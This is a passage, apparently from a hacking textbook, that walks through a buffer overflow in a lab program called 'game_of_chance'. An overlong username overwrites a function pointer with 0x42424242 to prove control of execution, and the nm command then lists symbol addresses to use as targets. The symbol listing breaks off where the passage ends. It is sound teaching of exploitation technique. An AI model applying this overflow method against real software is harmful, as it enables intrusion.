Exploitation 159Enter your new name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Your name has been changed.
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 60 credits] -> 1
[DEBUG] current_game pointer @ 0x42424242
Segmentation fault
reader@hacking:~/booksrc $
Select menu option 5 to change the username, and paste in the overflow
buffer. This will overwrite the function pointer with 0x42424242. When menu
option 1 is selected again, the program will crash when it tries to call the
function pointer. This is proof that execution can be controlled; now all
that’s needed is a valid address to insert in place of BBBB.
The nm command lists symbols in object files. This can be used to find
addresses of various functions in a program.
reader@hacking:~/booksrc $ nm game_of_chance
0804b508 d _DYNAMIC
0804b5d4 d _GLOBAL_OFFSETTABLE
080496c4 R _IO_stdin_used
w _Jv_RegisterClasses
0804b4f8 d CTOR_END
0804b4f4 d CTOR_LIST
0804b500 d DTOR_END
0804b4fc d DTOR_LIST
0804a4f0 r FRAME_END
0804b504 d JCR_END
0804b504 d JCR_LIST
0804b630 A bss_start
0804b624 D data_start
08049670 t do_global_ctors_aux
08048610 t __do_global_dtors_aux
0804b628 D dso_handle
w __gmon_start
08049669 T i686.get_pc_thunk.bx
0804b4f4 d init_array_end
0804b4f4 d init_array_start
080495f0 T libc_csu_fini
08049600 T libc_csu_init
U __libc_start_main@@GLIBC_2.0